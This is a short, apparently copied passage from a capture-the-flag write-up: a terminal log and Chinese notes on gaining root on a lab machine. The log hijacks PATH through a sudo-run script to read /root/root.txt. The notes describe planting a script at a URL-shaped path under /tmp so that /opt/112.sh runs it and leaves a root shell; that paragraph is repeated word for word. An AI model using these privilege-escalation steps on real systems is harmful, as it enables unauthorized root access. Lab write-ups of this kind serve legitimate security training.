echo@Sysadmin:~$ echo'ls /root' > /tmp/free echo@Sysadmin:~$ chmod +x /tmp/free echo@Sysadmin:~$ export PATH="/tmp:$PATH" echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh Starting daily system information collection at Fri 31 Oct 2025 04:57:54 AM EDT ------------------------------------------------------
(这里省略)
root.txt ------------------------------------------------------ Report complete at Fri 31 Oct 2025 04:57:54 AM EDT echo@Sysadmin:~$ echo'cat /root/root.txt'>/tmp/free echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh Starting daily system information collection at Fri 31 Oct 2025 04:58:25 AM EDT ------------------------------------------------------
(这里省略)
flag{root-8b8a8b353298f798e3eb8628661617b6} ------------------------------------------------------ Report complete at Fri 31 Oct 2025 04:58:25 AM EDT
具体方法是在/tmp下创建一个文件pwn,路径为/tmp/https:/maze-sec.com/tools/pwn,写入恶意脚本。然后执行/opt/112.sh将它自己覆盖掉,使其内容变为https://maze-sec.com/tools/pwn
is a not good url.
切到/tmp路径下,再执行/opt/112.sh,它就会在当前路径下找到https:/maze-sec.com/tools/pwn这个脚本并执行,从而执行了恶意代码,再运行恶意代码创建的/tmp/rootbash即可得到root的shell
具体方法是在/tmp下创建一个文件pwn,路径为/tmp/https:/maze-sec.com/tools/pwn,写入恶意脚本。然后执行/opt/112.sh将它自己覆盖掉,使其内容变为https://maze-sec.com/tools/pwn
is a not good url.
切到/tmp路径下,再执行/opt/112.sh,它就会在当前路径下找到https:/maze-sec.com/tools/pwn这个脚本并执行,从而执行了恶意代码,再运行恶意代码创建的/tmp/rootbash即可得到root的shell